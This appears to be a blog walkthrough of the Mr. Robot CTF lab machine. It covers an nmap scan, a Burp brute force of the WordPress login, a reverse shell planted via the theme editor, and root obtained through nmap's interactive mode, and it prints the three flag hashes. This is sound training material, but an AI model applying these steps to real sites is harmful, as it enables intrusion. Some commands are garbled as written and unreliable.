Introduction

Participants of the Mr. Robot CTF must prove their expertise in penetration testing by successfully infiltrating a virtual machine and attaining root access. Featuring multiple levels of complexity, this challenge is designed to emulate the cyber security aspects depicted in the popular television series, Mr. Robot.

Understanding the Challenge

Mr. Robot CTF is a vulnerable virtual machine created with security vulnerabilities purposely implemented for exploitation. Its purpose is to find and exploit these weaknesses for full root access. Divided into multiple levels, each requiring distinct aptitudes and resources to surpass, this challenge offers an intriguing and difficult set of objectives.

To kick off the Mr. Robot CTF, downloading the corresponding virtual machine and importing it into your virtualization software, like VirtualBox or VMware, is essential. Both TryHackMe and vulnhub platforms are accessible to acquire the virtual machine.

STEPS >>

We are embarking on the challenge of playing Mr. ROBOT:1 CTF, which requires us to locate the IP address.

sudo nmap -v -sV 192.168.1.*

Examining ports 80/TCP and 443/TCP, it is apparent they are open.

Let’s investigate further.

We are now conducting an Aggressive scan on the IP address 192.168.1.17.

sudo nmap -A -v 192.168.1.17

Ensure that the robots.txt file is checked.

Now that we are aware of the three keys

let us locate them.

To obtain the first key of three, we need to access the file key-1-of-3.txt.

“073403c8a58a1f80d943455fb30724b9”

Using Dirbuster, it is possible to filter results.

After downloading the txt file found on http://192.168.1.17/fsocity.dic. Let us begin the process of counting the words within.

There is an excessive amount of text that needs to be narrowed down.

cat fsocity.dic|sort|uniq>fs.txt

We are now accessing the wp-admin page via dirb.

Utilizing the brute-force method with Burp Suite, I tested different login and password combinations by importing them from an fs.txt file.

Go to the appearance section, add the reverse shell code, then hit update.

Activate the shell immediately.

And on the Intently listening,

We have now gained access to the system.

python -c "import pty;pty.spawn('/bin/bash')"

With the given commands, you are now able to …

ls

cd home

ls

cd robot

ls

ls -ls

To access the file, it is now ready for use.

Afterward, ensure the hash is verified.

The password belonging to the user “robot” is “abcdefghijklmnopqrstuvwxyz”

Transform the user experience by modifying the system.

To move forward, utilize this command.

ls
cat key-2-of-3.txt

This is the second key to success. “822c73956184f694993bede3eb39f959

Now, examine Nmap and employ this command.

Cd ../../

Which nmap

Nmap –help

Nmap –interactive

!sh

At this juncture, we have accessed the root; therefore, let us use this command.

Ls
Cd root
Ls
Cat key-3-of-3.txt

The third key is present here. “04787ddef27c3dee1ee161b21670b4e4

Congratulations! Your machine has solved the problem.

0 Shares:
1 comment
Leave a Reply

Your email address will not be published. Required fields are marked *

You May Also Like